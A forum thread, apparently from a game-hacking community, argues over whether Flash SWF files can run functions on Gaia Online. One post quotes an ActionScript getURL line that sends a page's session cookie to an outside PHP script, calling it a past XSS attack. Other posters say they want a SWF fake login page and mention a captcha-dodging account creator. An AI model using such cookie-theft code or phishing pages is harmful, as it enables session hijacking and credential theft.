Is it possible?, if anyone here knows can you explain how it works and show me a tutorial or something
Printable View
Is it possible?, if anyone here knows can you explain how it works and show me a tutorial or something
SWF's can't produce there own functions. They need to get functions off of certain HTML, PHP, and JS files. So it might be possible, with the correct files.Quote:
Originally Posted by PedoBear™
Wait, what?Quote:
Originally Posted by Chad
You should already know this or stop trying to be a smart ass.Quote:
Originally Posted by Artificial
When we made the Account Creator it couldn't generate it's own Nonce value and it got it from a php file.
....Quote:
Originally Posted by Chad
You are sadly mistaken.
SWFs are written in a programming language called ActionScript. :l
They can do a lot of shit.
For example, using getURL, a silent XSS attack was applied in the past.
^above will no longer work because sids are now HTTPOnly in Gaia and because for any respectable flash game, script access is denied by sites not on the same domain.Code:getURL('javascript:document.location="http://mysite.sub.com/cookies.php?sid="+document.cookie;');
The reason it was silent is this: the JavaScript had no access to the actual page so redirected what it could. That is to say, the swf was redirected but not the page (I think).
Anyway, you're pretty much completely wrong.
Side Note: The reason it couldn't generate it's own nonce is that Gaia uses GSI, their personal API.
They have a file that generates nonce already. Why the hell should they port a PHP function to ActionScript if they already generate it with PHP in their API?
Also, to do so would involve exposing system resources to the Flash file. This would potentially be BAD.
Basically, what I'm trying to say is this: They would have to be complete dumbasses to generate a nonce on the client side since nonce is for security and that would totally defeat the purpose.
For more information on ActionScript, check out the following:
ActionScript - Wikipedia, the free encyclopedia
Macromedia Flash - ActionScript Dictionary : Contents of the dictionary
ActionScript.org Flash, Flex and ActionScript Community - Tutorials, Support, Open Source & More
Also, because I just can't stop myself: How do you think Gaia's shit does anything they intend for it to do if the SWFs can't perform any kind of function?
Also, how do you think the flash shit GETS the data from the PHP file?
Also, HTML is not a programming language. You aren't gonna program anything for flash in HTML.
You can pass variables, but if you didn't know SWFs could perform functions, that's irrelevant anyway.
And you call yourself a programmer?
@OP, I'm not really sure what you mean. If you explain a bit more, I'll do everything I can to help you out.
If you mean getting info on swfs, then try this: https://addons.mozilla.org/en-US/firefox/addon/14465/
If you mean logging any swfs called, I'll rig up some greasemonkey script to save swfs from w/e sites you want to a web server.
Etc. What do you need?
Personoid, You Lost Me At ...
Why? :lQuote:
Originally Posted by iGawd
It's pretty simple. It's supposed to be simple enough that you can get a general idea even though you don't understand some of it.
I Think Im Beginning To Understand.
I feel you bro i am kinda lost to but ill still take a look.
Edit:
Ok so ive found a method so for example think of a for like this:
Code:<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
<TITLE>Saving text to text file</TITLE>
<script src="activeFlash.js" type="text/javascript"></script>
</HEAD>
<BODY bgcolor="#FFFFFF" scroll="no">
<Table cellpadding="0" cellspacing="0" width="100%" height="100%" ><tr><td align="center" valign="middle">
<script language="javascript">activeObject();</script>
</td></tr></table>
</BODY>
</HTML>
Uhm.. Pedo.. Thats just an html page... That has really no use at all.
You made your account creator in Flash? What a weird thing to do.
LMFAO! Im still in progress i am working on the source.Quote:
Originally Posted by GamerForce
The only way a swf file is going to function you will need to learn Actionscript
Hey man, can you explain exactly what you're trying to do. I'm thinking you're trying to use fscommand?
Tell me what you're trying to do.
Basically a FLP except using a SWF script rather than a HTML based page.Quote:
Originally Posted by Lain
Are you sure? If so that's probably one of the easiest things.
Lol, if your making a SWF Flp, ive made one, its easy :)
Yes It can be done. I cant remember how, because this was a while ago back on LG 1.0
I've reformatted since than, and bought a new computer. If I ever find the source again I will show you.
Except we don't know for sure if that's the case. There's other things he could mean. Which is why I'm kind of waiting for him to elaborate.
Nah, back in the days when a captcha was required on registration, I just mimicked the flash file (with no captcha) to create a mule creator in Java.Quote:
Originally Posted by Lain
Nowadays I believe they have a standard ajax form with no captcha? Haven't looked at the site in a while.
Exactly.. Which is why that html has no use at all..Quote:
Originally Posted by PedoBear™